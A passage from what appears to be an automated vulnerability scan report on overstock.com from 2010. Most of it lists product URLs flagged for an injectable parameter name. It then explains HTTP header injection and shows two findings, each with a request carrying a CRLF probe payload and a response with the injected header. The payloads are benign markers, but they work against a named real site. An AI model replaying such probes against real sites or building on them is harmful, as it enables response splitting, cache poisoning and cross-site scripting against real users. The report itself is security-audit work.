2.393. http://www.overstock.com/Home-Garden/Winthrop-81-piece-Flatware-Set/5124073/product.html [name of an arbitrarily supplied request parameter]

2.394. http://www.overstock.com/Home-Garden/Wood-Bookcase-Display-Cabinet/4734278/product.html [name of an arbitrarily supplied request parameter]

2.395. http://www.overstock.com/Home-Garden/Wood-Corner-Computer-Desk/2481102/product.html [name of an arbitrarily supplied request parameter]

2.396. http://www.overstock.com/Home-Garden/Wrinkle-resistant-300-TC-Reversible-Solid-Stripe-Duvet-Cover-Set/4064084/product.html [name of an arbitrarily supplied request parameter]

2.397. http://www.overstock.com/Jewelry-Watches/10k-Gold-1-3ct-TDW-Black-and-White-Diamond-Heart-Ring-I-J-I2-I3/3300998/product.html [name of an arbitrarily supplied request parameter]

2.398. http://www.overstock.com/Jewelry-Watches/14k-Gold-1-2ct-TDW-Round-Value-Diamond-Studs-K-L-I2-I3/3324616/product.html [name of an arbitrarily supplied request parameter]

2.399. http://www.overstock.com/Jewelry-Watches/14k-Gold-1-4ct-TDW-Round-Diamond-3-stone-Earrings-H-I-I2-I3/2069877/product.html [name of an arbitrarily supplied request parameter]

2.400. http://www.overstock.com/Jewelry-Watches/14k-Gold-Overlay-Curved-Textured-Hinged-Bracelet/3846813/product.html [name of an arbitrarily supplied request parameter]

2.401. http://www.overstock.com/Jewelry-Watches/14k-White-Gold-1-6ct-TDW-Diamond-Lightweight-Ring-I-J-I2-I3/2116823/product.html [name of an arbitrarily supplied request parameter]

2.402. http://www.overstock.com/Jewelry-Watches/14k-White-Gold-Overlay-Martini-set-CZ-Earrings/3866859/product.html [name of an arbitrarily supplied request parameter]

2.403. http://www.overstock.com/Jewelry-Watches/18k-Gold-over-Silver-Diamond-Accent-Hoop-Earrings/3998857/product.html [name of an arbitrarily supplied request parameter]

2.404. http://www.overstock.com/Jewelry-Watches/18k-Gold-over-Silver-Diamond-Accent-Mini-hoop-Earrings/3998862/product.html [name of an arbitrarily supplied request parameter]

2.405. http://www.overstock.com/Jewelry-Watches/18k-Gold-over-Sterling-Silver-Multi-gemstone-Hoop-Earrings/3128810/product.html [name of an arbitrarily supplied request parameter]

2.406. http://www.overstock.com/Jewelry-Watches/18kt-Over-Sterling-Silver-and-1-8-ct-tw-Diamond-Bracelet-J-K-I3/4473432/product.html [name of an arbitrarily supplied request parameter]

2.407. http://www.overstock.com/Jewelry-Watches/22k-Gold-Silver-Double-Hoop-Diamond-cut-Earrings/3437593/product.html [name of an arbitrarily supplied request parameter]

2.408. http://www.overstock.com/Jewelry-Watches/Akribos-XXIV-Mens-Diamond-accented-Quartz-Chronograph-Bracelet-Watch/4611516/product.html [name of an arbitrarily supplied request parameter]

2.409. http://www.overstock.com/Jewelry-Watches/Akribos-XXIV-Mens-Large-Dial-Diamond-Quartz-Chronograph-Bracelet-Watch/3465738/product.html [name of an arbitrarily supplied request parameter]

2.410. http://www.overstock.com/Jewelry-Watches/Akribos-XXIV-Mens-Saturnos-Skeleton-Dial-Automatic-Watch/4719552/product.html [name of an arbitrarily supplied request parameter]

2.411. http://www.overstock.com/Jewelry-Watches/Barbie-Interchangeable-Girls-Watch/3010615/product.html [name of an arbitrarily supplied request parameter]

2.412. http://www.overstock.com/Jewelry-Watches/Black-plated-Tungsten-Carbide-Band-8-mm/4747377/product.html [name of an arbitrarily supplied request parameter]

2.413. http://www.overstock.com/Jewelry-Watches/Breast-Cancer-Awareness-Designer-Bangle-Bracelet/4069809/product.html [name of an arbitrarily supplied request parameter]

2.414. http://www.overstock.com/Jewelry-Watches/Citizen-Eco-Drive-Mens-Chronograph-Canvas-Strap-Watch/3950639/product.html [name of an arbitrarily supplied request parameter]

2.415. http://www.overstock.com/Jewelry-Watches/Disneys-Mickey-Mouse-Character-Mens-Watch/4421993/product.html [name of an arbitrarily supplied request parameter]

2.416. http://www.overstock.com/Jewelry-Watches/Disneys-Mickey-Mouse-Character-Womens-Watch/4421886/product.html [name of an arbitrarily supplied request parameter]

2.417. http://www.overstock.com/Jewelry-Watches/Disneys-Mickey-Mouse-Womens-Silvertone-Watch/4421887/product.html [name of an arbitrarily supplied request parameter]

2.418. http://www.overstock.com/Jewelry-Watches/Disneys-Minnie-Mouse-Womens-Silvertone-Watch/4421888/product.html [name of an arbitrarily supplied request parameter]

2.419. http://www.overstock.com/Jewelry-Watches/Dufonte-by-Lucien-Piccard-Two-tone-Crystal-Watch/1856866/product.html [name of an arbitrarily supplied request parameter]

2.420. http://www.overstock.com/Jewelry-Watches/Fossil-ES2444-Womens-Stella-White-Glitz-Chrono-Watch/5074818/product.html [name of an arbitrarily supplied request parameter]

2.421. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Cubic-Zirconia-Accented-Silicone-Watch/4814479/product.html [name of an arbitrarily supplied request parameter]

2.422. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Mens-Dual-face-Genuine-Leather-Watch/4034798/product.html [name of an arbitrarily supplied request parameter]

2.423. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Polished-Swirl-Cuff-Watch/2925811/product.html [name of an arbitrarily supplied request parameter]

2.424. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Womens-Cubic-Zirconia-Accented-Silicone-Watch/4814916/product.html [name of an arbitrarily supplied request parameter]

2.425. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Womens-Rhinestone-Watch/2326288/product.html [name of an arbitrarily supplied request parameter]

2.426. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-CZ-Accent-Silicon-Link-style-Watch/4400944/product.html [name of an arbitrarily supplied request parameter]

2.427. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-Platinum-CZ-Accent-Watch/4274322/product.html [name of an arbitrarily supplied request parameter]

2.428. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-Platinum-Cubic-Zirconia-Accent-Watch/4777296/product.html [name of an arbitrarily supplied request parameter]

2.429. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-Platinum-Cubic-Zirconia-Accent-Watch/4777298/product.html [name of an arbitrarily supplied request parameter]

2.430. http://www.overstock.com/Jewelry-Watches/Invicta-II-Mens-Stainless-Steel-Silver-Dial-Chronograph-Watch/4413284/product.html [name of an arbitrarily supplied request parameter]

2.431. http://www.overstock.com/Jewelry-Watches/Invicta-Mens-Invicta-II-Blue-Dial-Stainless-Steel-Watch/4354450/product.html [name of an arbitrarily supplied request parameter]

2.432. http://www.overstock.com/Jewelry-Watches/Invicta-Mens-Swiss-Quartz-Steel-Watch/1729425/product.html [name of an arbitrarily supplied request parameter]

2.433. http://www.overstock.com/Jewelry-Watches/Invicta-Pro-Diver-Mens-Automatic-Steel-Watch/1891965/product.html [name of an arbitrarily supplied request parameter]

2.434. http://www.overstock.com/Jewelry-Watches/Kenneth-Cole-Mens-Black-Leather-Strap-Watch/5206267/product.html [name of an arbitrarily supplied request parameter]

2.435. http://www.overstock.com/Jewelry-Watches/Kenneth-Cole-Womens-Mother-of-Pearl-Skeleton-Dial-Automatic-Watch/4750508/product.html [name of an arbitrarily supplied request parameter]

2.436. http://www.overstock.com/Jewelry-Watches/Maddy-Emerson-Freshwater-Pearl-and-Multigemstone-Necklace-7-10-mm/5197013/product.html [name of an arbitrarily supplied request parameter]

2.437. http://www.overstock.com/Jewelry-Watches/Maddy-Emerson-White-Pearl-Citrine-and-Jade-Bracelet-8-9-mm/3248501/product.html [name of an arbitrarily supplied request parameter]

2.438. http://www.overstock.com/Jewelry-Watches/Michael-Kors-Womens-MK5055-Chronograph-Watch/5084186/product.html [name of an arbitrarily supplied request parameter]

2.439. http://www.overstock.com/Jewelry-Watches/Pewter-Turquoise-and-Coral-Teardrop-Earrings/2552569/product.html [name of an arbitrarily supplied request parameter]

2.440. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-1-5ct-TDW-Brown-Diamond-Square-Ring/3671310/product.html [name of an arbitrarily supplied request parameter]

2.441. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-1-8ct-TDW-Diamond-Flower-Necklace/4048632/product.html [name of an arbitrarily supplied request parameter]

2.442. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-20-inch-Snake-Chain/2656194/product.html [name of an arbitrarily supplied request parameter]

2.443. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Bead-Bracelet/567747/product.html [name of an arbitrarily supplied request parameter]

2.444. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Black-Diamond-Accent-Buckle-Ring/4771446/product.html [name of an arbitrarily supplied request parameter]

2.445. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Black-Diamond-Cat-Necklace/4737276/product.html [name of an arbitrarily supplied request parameter]

2.446. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Black-Pearl-and-Diamond-Necklace-9-10-mm/3804500/product.html [name of an arbitrarily supplied request parameter]

2.447. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Blue-Cubic-Zirconia-and-Marcasite-Earrings/4420243/product.html [name of an arbitrarily supplied request parameter]

2.448. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-CZ-Bridal-Engagement-Ring-Set/4058274/product.html [name of an arbitrarily supplied request parameter]

2.449. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-CZ-Heart-and-Key-Necklace/657565/product.html [name of an arbitrarily supplied request parameter]

2.450. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Created-Sapphire-and-1-10ct-TDW-Diamond-Earrings-I-J-I3/4107532/product.html [name of an arbitrarily supplied request parameter]

2.451. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Cultured-Freshwater-Pearl-Bracelet/1897192/product.html [name of an arbitrarily supplied request parameter]

2.452. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Diamond-Accent-Butterfly-Necklace/4138242/product.html [name of an arbitrarily supplied request parameter]

2.453. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Filigree-CZ-Ring/1006299/product.html [name of an arbitrarily supplied request parameter]

2.454. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Large-Fleur-de-Lis-Necklace/3037717/product.html [name of an arbitrarily supplied request parameter]

2.455. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Marcasite-and-Turquoise-Heart-Necklace/1871971/product.html [name of an arbitrarily supplied request parameter]

2.456. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Multi-gemstone-Stud-Earrings-Set-of-5/4094670/product.html [name of an arbitrarily supplied request parameter]

2.457. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Onyx-and-Marcasite-Heart-Locket-Necklace/753913/product.html [name of an arbitrarily supplied request parameter]

2.458. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Oval-Turquoise-Hook-Earrings/3232265/product.html [name of an arbitrarily supplied request parameter]

2.459. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Pave-Style-Round-Cut-CZ-Ring/2869562/product.html [name of an arbitrarily supplied request parameter]

2.460. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Picture-Frame-Pendant/1037779/product.html [name of an arbitrarily supplied request parameter]

2.461. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Princess-CZ-Bridal-Engagement-Ring-Set/4058275/product.html [name of an arbitrarily supplied request parameter]

2.462. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Tapered-Ring/629543/product.html [name of an arbitrarily supplied request parameter]

2.463. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-X-and-O-Diamond-Accent-Bracelet-J-K-I3/4405140/product.html [name of an arbitrarily supplied request parameter]

2.464. http://www.overstock.com/Jewelry-Watches/Stuhrling-Original-Mens-Othello-Skeleton-Automatic-Watch/4692564/product.html [name of an arbitrarily supplied request parameter]

2.465. http://www.overstock.com/Jewelry-Watches/Stuhrling-Original-Mens-Romeo-Automatic-Black-Strap-Watch/5109862/product.html [name of an arbitrarily supplied request parameter]

2.466. http://www.overstock.com/Jewelry-Watches/Timex-Kidz-Childrens-Pink-Blue-Flowers-Watch/5156959/product.html [name of an arbitrarily supplied request parameter]

2.467. http://www.overstock.com/Jewelry-Watches/Timex-Kidz-Silvertone-Flame-Digital-Watch/5141580/product.html [name of an arbitrarily supplied request parameter]

2.468. http://www.overstock.com/Jewelry-Watches/Timex-Womens-Stainless-Steel-Two-tone-Watch/5147164/product.html [name of an arbitrarily supplied request parameter]

2.469. http://www.overstock.com/Jewelry-Watches/Tungsten-Carbide-Brushed-and-Polished-Beveled-Edge-Ring-7-mm/5085667/product.html [name of an arbitrarily supplied request parameter]

2.470. http://www.overstock.com/Jewelry-Watches/Tungsten-Carbide-Grooved-Mens-Wedding-Band/3460866/product.html [name of an arbitrarily supplied request parameter]

2.471. http://www.overstock.com/Jewelry-Watches/Tungsten-Carbide-Mens-1-5ct-TDW-Diamond-Comfort-fit-Band-8-mm/4311094/product.html [name of an arbitrarily supplied request parameter]

2.472. http://www.overstock.com/Jewelry-Watches/Tungsten-with-Black-and-Blue-Carbon-Fiber-Inlay-Ring-8-mm/5162780/product.html [name of an arbitrarily supplied request parameter]

2.473. http://www.overstock.com/Jewelry-Watches/White-Rhodium-Overlay-Cubic-Zirconia-Bridal-inspired-Rings-Set/4338561/product.html [name of an arbitrarily supplied request parameter]

2.474. http://www.overstock.com/Luggage-Bags/CalPak-Negotiator-Expandable-Soft-Messenger-Briefcase/3443091/product.html [name of an arbitrarily supplied request parameter]

2.475. http://www.overstock.com/Luggage-Bags/CalPak-S-Curve-Solid-18-Inch-Lightweight-Utility-Backpack/3442998/product.html [name of an arbitrarily supplied request parameter]

2.476. http://www.overstock.com/Luggage-Bags/Heys-Digital-E-scale/4333013/product.html [name of an arbitrarily supplied request parameter]

2.477. http://www.overstock.com/Luggage-Bags/Heys-XCase-20-inch-Carry-on-Luggage/3378644/product.html [name of an arbitrarily supplied request parameter]

2.478. http://www.overstock.com/Luggage-Bags/Korus-Aca-De-Grande-19.5-inch-Wheeled-Backpack/4089367/product.html [name of an arbitrarily supplied request parameter]

2.479. http://www.overstock.com/Luggage-Bags/Olympia-22-inch-8-pocket-Rolling-Duffel/3147701/product.html [name of an arbitrarily supplied request parameter]

2.480. http://www.overstock.com/Luggage-Bags/Olympia-29-inch-8-pocket-Rolling-Duffel/3147702/product.html [name of an arbitrarily supplied request parameter]

2.481. http://www.overstock.com/Luggage-Bags/Olympia-30-inch-Drop-bottom-Rolling-Duffel-Bag/4226715/product.html [name of an arbitrarily supplied request parameter]

2.482. http://www.overstock.com/Luggage-Bags/Pacific-Gear-19-inch-Multi-Zippered-Pocket-Rolling-Backpack/5016785/product.html [name of an arbitrarily supplied request parameter]

2.483. http://www.overstock.com/Luggage-Bags/Purdue-Collegiate-Sport-Duffel/4579529/product.html [name of an arbitrarily supplied request parameter]

2.484. http://www.overstock.com/Luggage-Bags/Solo-Colombian-Leather-Laptop-Portfolio/3166854/product.html [name of an arbitrarily supplied request parameter]

2.485. http://www.overstock.com/Luggage-Bags/Travel-Select-Amsterdam-4-piece-Luggage-Set/711428/product.html [name of an arbitrarily supplied request parameter]

2.486. http://www.overstock.com/Luggage-Bags/Travel-Select-Amsterdam-Lightweight-29-inch-Rolling-Upright-Suitcase/3019553/product.html [name of an arbitrarily supplied request parameter]

2.487. http://www.overstock.com/Luggage-Bags/Travel-Select-Light-Weight-Amsterdam-21-inch-Carry-on/2969442/product.html [name of an arbitrarily supplied request parameter]

2.488. http://www.overstock.com/Luggage-Bags/Travelers-Choice-Siena-21-inch-Hybrid-Upright-Garment-Bag/4313510/product.html [name of an arbitrarily supplied request parameter]

2.489. http://www.overstock.com/Luggage-Bags/U.S.-Traveler-RIO-2-piece-Expandable-Carry-on-Luggage-Set/3275005/product.html [name of an arbitrarily supplied request parameter]

2.490. http://www.overstock.com/Main-Street-Revolution/Headbandz-Crochet-Unique-Flower-Headband/5178675/product.html [name of an arbitrarily supplied request parameter]

2.491. http://www.overstock.com/Office-Furniture/Boss-Caressoft-Reception-Box-Arm-Chair/2201945/product.html [name of an arbitrarily supplied request parameter]

2.492. http://www.overstock.com/Office-Furniture/Boss-Lumbar-Support-Executive-Chair/2377844/product.html [name of an arbitrarily supplied request parameter]

2.493. http://www.overstock.com/Office-Furniture/Boss-Mesh-Back-Task-Chair/2958050/product.html [name of an arbitrarily supplied request parameter]

2.494. http://www.overstock.com/Office-Furniture/Boss-NTR-Executive-Leather-Chair/3187832/product.html [name of an arbitrarily supplied request parameter]

2.495. http://www.overstock.com/Office-Furniture/Ergo-Mesh-High-back-Executive-Chair/3082638/product.html [name of an arbitrarily supplied request parameter]

2.496. http://www.overstock.com/Office-Furniture/Ergo-Value-Mesh-Medium-Back-Task-Chair/3861788/product.html [name of an arbitrarily supplied request parameter]

2.497. http://www.overstock.com/Office-Furniture/Lifetime-4-foot-Adjustable-Height-Fold-in-half-Table/4579208/product.html [name of an arbitrarily supplied request parameter]

2.498. http://www.overstock.com/Office-Furniture/Lifetime-Black-Personal-Folding-Table/4721849/product.html [name of an arbitrarily supplied request parameter]

2.499. http://www.overstock.com/Office-Furniture/Office-Star-Professional-Air-Grid-Deluxe-Task-Chair/2605023/product.html [name of an arbitrarily supplied request parameter]

2.500. http://www.overstock.com/Office-Supplies/Brother-LC51-Compatible-Deluxe-Ink-Combo-Pack-of-5/2667500/product.html [name of an arbitrarily supplied request parameter]

2.501. http://www.overstock.com/Office-Supplies/Cool-Lift-Laptop-Computer-Cooling-Stand/2543946/product.html [name of an arbitrarily supplied request parameter]

2.502. http://www.overstock.com/Office-Supplies/Cork-Wall-Tiles-Pack-of-4/4239510/product.html [name of an arbitrarily supplied request parameter]

2.503. http://www.overstock.com/Office-Supplies/Cross-Cut-Shredder/4761404/product.html [name of an arbitrarily supplied request parameter]

2.504. http://www.overstock.com/Office-Supplies/Cyber-Gel-Stress-Relief-Ball/2614320/product.html [name of an arbitrarily supplied request parameter]

2.505. http://www.overstock.com/Office-Supplies/Fellowes-Powershred-P-58Cs-Shredder/3829872/product.html [name of an arbitrarily supplied request parameter]

2.506. http://www.overstock.com/Office-Supplies/HP-56-Black-Ink-Cartridge-Remanufactured/3420430/product.html [name of an arbitrarily supplied request parameter]

2.507. http://www.overstock.com/Office-Supplies/Ink-Cartridge-Combo-for-HP-95-98-Remanufactured/4274383/product.html [name of an arbitrarily supplied request parameter]

2.508. http://www.overstock.com/Office-Supplies/Parker-Vector-Stainless-Steel-Medium-Point-Fountain-Pen/5072230/product.html [name of an arbitrarily supplied request parameter]

2.509. http://www.overstock.com/Office-Supplies/Pilot-Varsity-Multi-pack-Disposable-Fountain-Pens-Pack-of-7/4222380/product.html [name of an arbitrarily supplied request parameter]

2.510. http://www.overstock.com/Office-Supplies/The-Butt-Station-Blue-Assistant/3374082/product.html [name of an arbitrarily supplied request parameter]

2.511. http://www.overstock.com/Office-Supplies/Waterman-Phileas-Black-Fountain-Pen/5072231/product.html [name of an arbitrarily supplied request parameter]

2.512. http://www.overstock.com/Sports-Toys/Eccotemp-L5-Outdoor-Portable-Tankless-Water-Heater/3650782/product.html [name of an arbitrarily supplied request parameter]

2.513. http://www.overstock.com/Sports-Toys/Predator-Wear-Womens-Minnow-Snow-Pants/4333393/product.html [name of an arbitrarily supplied request parameter]

2.514. http://www.overstock.com/Sports-Toys/Slumberjack-Gallatin-15-degree-Mummy-Sleeping-Bag/5077923/product.html [name of an arbitrarily supplied request parameter]

2.515. http://www.overstock.com/Sports-Toys/Tour-Vision-Monterey-Edition-Sunglasses/3848541/product.html [name of an arbitrarily supplied request parameter]

2.516. http://www.overstock.com/Sports-Toys/Very-Bright-42-bulb-LED-Flashlight/3442486/product.html [name of an arbitrarily supplied request parameter]

2.517. http://www.overstock.com/Worldstock/Agate-Inlaid-Handbag-India/544846/product.html [name of an arbitrarily supplied request parameter]

2.518. http://www.overstock.com/Worldstock/Bamboo-Grove-Canvas-Wall-Art-China/5079546/product.html [name of an arbitrarily supplied request parameter]

2.519. http://www.overstock.com/Worldstock/Brass-plated-Circle-of-Life-Cuff-Bracelet-India/4714454/product.html [name of an arbitrarily supplied request parameter]

2.520. http://www.overstock.com/Worldstock/Chinese-Bamboo-Rug-2x3/3943579/product.html [name of an arbitrarily supplied request parameter]

2.521. http://www.overstock.com/Worldstock/Fused-Glass-Ocean-River-Meadow-Earrings-Chile/4655190/product.html [name of an arbitrarily supplied request parameter]

2.522. http://www.overstock.com/Worldstock/Garnet-and-Carnelian-Tropical-Orchard-Cluster-Earrings-Thailand/5074088/product.html [name of an arbitrarily supplied request parameter]

2.523. http://www.overstock.com/Worldstock/Genuine-Leather-Brown-Riddles-Bracelet-Thailand/3291263/product.html [name of an arbitrarily supplied request parameter]

2.524. http://www.overstock.com/Worldstock/Handcrafted-Recycled-Glass-Icicle-Ornaments-20-pack-India/550216/product.html [name of an arbitrarily supplied request parameter]

2.525. http://www.overstock.com/Worldstock/Handcrafted-Turquoise-Attitude-Silver-Ring-Mexico/5191699/product.html [name of an arbitrarily supplied request parameter]

2.526. http://www.overstock.com/Worldstock/Handmade-Glass-and-Agate-Summer-Meadow-Necklace-India/3167006/product.html [name of an arbitrarily supplied request parameter]

2.527. http://www.overstock.com/Worldstock/Iron-Dragon-Fly-Hanging-Bells-India/4042483/product.html [name of an arbitrarily supplied request parameter]

2.528. http://www.overstock.com/Worldstock/Oil-on-Canvas-Buddha-Profile-Painting-Indonesia/5036482/product.html [name of an arbitrarily supplied request parameter]

2.529. http://www.overstock.com/Worldstock/Pearl-River-of-Snow-Strand-Necklace-3-8-mm-Thailand/4611190/product.html [name of an arbitrarily supplied request parameter]

2.530. http://www.overstock.com/Worldstock/Ribbon-Candy-Electroplated-Earrings-Kenya/4349561/product.html [name of an arbitrarily supplied request parameter]

2.531. http://www.overstock.com/Worldstock/Set-of-2-Bold-Orange-Fortunes-Beaded-Wristband-Bracelets-Thailand/5086320/product.html [name of an arbitrarily supplied request parameter]

2.532. http://www.overstock.com/Worldstock/Set-of-2-Coins-of-The-Earth-Beaded-Wristband-Bracelets-Thailand/4787363/product.html [name of an arbitrarily supplied request parameter]

2.533. http://www.overstock.com/Worldstock/Silver-Filigree-Rain-Earrings-China/4798411/product.html [name of an arbitrarily supplied request parameter]

2.534. http://www.overstock.com/Worldstock/Tree-of-Life-24-inch-Wall-Hanging-Haiti/3471069/product.html [name of an arbitrarily supplied request parameter]

2.535. http://www.overstock.com/search [keywords parameter]

2.536. http://www.overstock.com/search [keywords parameter]



1. HTTP header injection
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://www.overstock.com/search [SearchType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /search

Issue detail

The value of the SearchType request parameter is copied into the Set-Cookie response header. The payload 38a98%0d%0a33897e1ca0a was submitted in the SearchType parameter. This caused a response containing an injected HTTP header.

Request

GET /search?taxonomy=&keywords=%60&SearchType=38a98%0d%0a33897e1ca0a HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://www.overstock.com/Sports-Toys/5/store.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; clubogiftcards=clubogctotal^0.00; se_list=se_list^0|2|; s_pers=%20gpv_p13%3DHomePage%2520-%2520New%2520Untracked%7C1289343466851%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doverstock.com%253D%252526pid%25253DHomePage%25252520-%25252520New%25252520Untracked%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.overstock.com/Sports-Toys/5/store.html%252526ot%25253DA%3B; ostk_aggr_session=csbshow^0|mxcshopmore^Sports-Toys/5/store.html|searchhistory^categories; cinfo=ccnt^0:ctmst^1289320132943; mxclastvisit=20101109; mxcsurftype=2

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:37:53 GMT
Server: Apache
Expires: Tue, 09 Nov 2010 16:37:53 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101109; Domain=.overstock.com; Expires=Wed, 09-Nov-2011 16:37:53 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="csbshow^0|mxcshopmore^/search%3Fkeywords%3D`%26searchtype%3D38a98
33897e1ca0a
%26taxonomy%3D|searchhistory^keywords"; Domain=.overstock.com; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289320673271; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 63224

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j32.overstock.com ssl:f
...[SNIP]...

1.2. http://www.overstock.com/search [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /search

Issue detail

The value of the keywords request parameter is copied into the Set-Cookie response header. The payload 6d6b5%0d%0ac2356b260d7 was submitted in the keywords parameter. This caused a response containing an injected HTTP header.

Request

GET /search?taxonomy=&keywords=6d6b5%0d%0ac2356b260d7&SearchType=Header HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://www.overstock.com/Sports-Toys/5/store.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; clubogiftcards=clubogctotal^0.00; se_list=se_list^0|2|; s_pers=%20gpv_p13%3DHomePage%2520-%2520New%2520Untracked%7C1289343466851%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doverstock.com%253D%252526pid%25253DHomePage%25252520-%25252520New%25252520Untracked%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.overstock.com/Sports-Toys/5/store.html%252526ot%25253DA%3B; ostk_aggr_session=csbshow^0|mxcshopmore^Sports-Toys/5/store.html|searchhistory^categories; cinfo=ccnt^0:ctmst^1289320132943; mxclastvisit=20101109; mxcsurftype=2

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:35:31 GMT
Server: Apache
Expires: Tue, 09 Nov 2010 16:35:31 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289320531725; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101109; Domain=.overstock.com; Expires=Wed, 09-Nov-2011 16:35:31 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="csbshow^0|mxcshopmore^/search%3Fkeywords%3D6d6b5
c2356b260d7
